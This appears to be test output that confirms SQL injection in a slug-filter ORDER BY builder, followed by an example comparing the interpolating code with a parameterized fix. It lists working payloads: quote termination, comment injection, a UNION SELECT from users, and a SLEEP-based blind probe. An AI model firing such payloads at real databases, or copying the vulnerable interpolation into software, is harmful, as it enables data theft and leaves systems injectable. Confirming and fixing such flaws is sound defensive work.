Testing SQL Injection in slug-filter-order.js
==============================================

Test 1: Normal slug filter
Input:  slug:[kitchen-sink,bacon,chorizo]
Output: CASE WHEN `tags`.`slug` = 'kitchen-sink' THEN 0 WHEN `tags`.`slug` = 'bacon' THEN 1 WHEN `tags`.`slug` = 'chorizo' THEN 2 END ASC

Test 2: SQL Injection payload (string termination)
Input:  slug:[' OR '1'='1]
Output: CASE WHEN `tags`.`slug` = '' OR '1'='1' THEN 0 END ASC
⚠️ VULNERABILITY CONFIRMED: Unsanitized user input in SQL! The payload was directly interpolated into the SQL string.

Test 3: SQL Injection payload (comment injection)
Input:  slug:[test'--]
Output: CASE WHEN `tags`.`slug` = 'test'--' THEN 0 END ASC
⚠️ VULNERABILITY CONFIRMED: SQL comment injection possible!

Test 4: SQL Injection payload (UNION-based)
Input:  slug:[test' UNION SELECT * FROM users--]
Output: CASE WHEN `tags`.`slug` = 'test' UNION SELECT * FROM users--' THEN 0 END ASC
⚠️ VULNERABILITY CONFIRMED: UNION-based SQL injection possible!

Test 5: SQL Injection payload (time-based/blind)
Input:  slug:[test' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--]
Output: CASE WHEN `tags`.`slug` = 'test' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--' THEN 0 END ASC
⚠️ VULNERABILITY CONFIRMED: Time-based SQL injection possible!

==============================================
SUMMARY:

The vulnerable code directly interpolates user input into SQL:

    order += `WHEN `${table}`.`slug` = '${slug}' THEN ${index} `;

This allows attackers to inject arbitrary SQL via the slug filter.
The fix uses parameterized queries with ? placeholders.

==============================================
✅ VULNERABILITY CONFIRMED
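To make the summary concrete, here is an added example (not the project's own slug-filter-order.js) that writes the same ORDER BY CASE builder twice: once with the string interpolation shown above, reproducing the Test 1 and Test 2 outputs, and once in the parameterized form the fix describes, where the SQL text carries only `?` placeholders and the slug values travel in a separate bindings array. The table name, the function names and the identifier allowlist are assumptions for the example; placeholders cannot stand in for identifiers, so the table name is validated separately.

```javascript
// Added example, not code from the page or the project it tests.
// Builds the "order by slug position" clause for a filter such as
// slug:[kitchen-sink,bacon,chorizo] in two ways.

// VULNERABLE pattern (the one the test output above exercises):
// every slug is spliced into the SQL text, so a slug containing a quote
// changes the statement instead of being compared as data.
function buildOrderUnsafe(table, slugs) {
    let order = 'CASE ';
    slugs.forEach((slug, index) => {
        order += `WHEN \`${table}\`.\`slug\` = '${slug}' THEN ${index} `;
    });
    return order + 'END ASC';
}

// HARDENED pattern: the SQL text contains only a validated identifier,
// integer positions generated by the code, and `?` placeholders. The slug
// values are returned as bindings for the driver to send separately, so
// their contents cannot alter the statement structure.
function buildOrderSafe(table, slugs) {
    // Placeholders cannot bind identifiers, so allowlist the table name
    // (assumed validation rule for this example).
    if (!/^[A-Za-z0-9_]+$/.test(table)) {
        throw new Error('invalid table identifier');
    }
    const clauses = slugs.map(
        (_, index) => `WHEN \`${table}\`.\`slug\` = ? THEN ${index}`
    );
    return {
        sql: `CASE ${clauses.join(' ')} END ASC`,
        bindings: slugs.slice()
    };
}

// Convenience check used by the comparison below: does the generated SQL
// text contain any user-supplied slug verbatim?
function sqlContainsUserInput(sql, slugs) {
    return slugs.some((slug) => sql.includes(slug));
}
```

With the Test 2 input, `buildOrderUnsafe('tags', ["' OR '1'='1"])` produces exactly the confirmed-vulnerable output listed above, while `buildOrderSafe` returns `CASE WHEN \`tags\`.\`slug\` = ? THEN 0 END ASC` with the payload sitting untouched in `bindings[0]`; the `sql` string never contains user input, which is the property a reviewer of the fix should check for.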